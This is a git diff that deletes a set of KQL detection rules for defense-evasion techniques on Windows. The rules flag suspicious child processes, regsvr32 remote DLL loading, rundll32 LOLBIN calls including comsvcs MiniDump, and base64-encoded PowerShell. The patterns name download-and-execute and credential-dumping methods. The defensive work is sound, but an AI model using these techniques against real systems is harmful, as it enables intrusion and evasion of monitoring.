-| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql b/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql
deleted file mode 100644
index ca49b897..00000000
--- a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj, X__Junior (Nextron Systems)
-// Date: 2021/07/30
-// Level: medium
-// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains ":\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql b/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql
deleted file mode 100644
index 08972048..00000000
--- a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/13
-// Level: high
-// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
deleted file mode 100644
index 25ef6289..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql
deleted file mode 100644
index d3abfa67..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql
deleted file mode 100644
index f5e4d204..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/05 -// Level: high -// Description: Detects potentially suspicious child processes of "regsvr32.exe". -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql deleted file mode 100644 index 4dc7fab5..00000000 --- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/26 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql deleted file mode 100644 index a30d1353..00000000 --- a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2024/05/13 -// Level: medium -// Description: Detects potentially suspicious child processes of KeyScrambler.exe -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe" \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql deleted file mode 100644 index a5a3cf74..00000000 --- a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/22 -// Level: high -// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file 
diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql deleted file mode 100644 index 04a1ecbd..00000000 --- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023/12/21 -// Level: medium -// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - -// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2")) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql deleted file mode 100644 index ea293a77..00000000 --- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023/12/21 -// Level: medium -// Description: Detects regsitry value settings that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - -// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001 -DeviceRegistryEvents -| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe")) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql deleted file mode 100644 index 0897182f..00000000 --- a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/03/19 -// Level: high -// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe"))) \ No newline at end of file 
diff --git a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql deleted file mode 100644 index 1175f08b..00000000 --- a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: high -// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe" -// Tags: attack.defense_evasion -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql b/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql deleted file mode 100644 index 1babab4d..00000000 --- a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/21 -// Level: high -// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql b/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql deleted file mode 100644 index 60ec888b..00000000 --- a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/11 -// Level: high -// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or 
ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9") \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql b/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql deleted file mode 100644 index ba699c24..00000000 --- a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine 
contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql b/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql deleted file mode 100644 index 7508341f..00000000 --- a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/12 -// Level: medium -// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution -// Tags: attack.defense_evasion -DeviceProcessEvents -| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql b/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql deleted file mode 100644 index 7b6fc83b..00000000 --- a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: medium -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. -One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceNetworkEvents -| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ")))) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql deleted file mode 100644 index e2931fc4..00000000 
--- a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/08/24 -// Level: high -// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line -// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw") \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql deleted file mode 100644 index be3160c2..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t -// Date: 2022/05/20 -// Level: high -// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file 
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql deleted file mode 100644 index 7b67f975..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) -// Date: 2022/03/01 -// Level: high -// Description: Detects base64 encoded .NET reflective loading of Assembly -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620 -DeviceProcessEvents -| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains 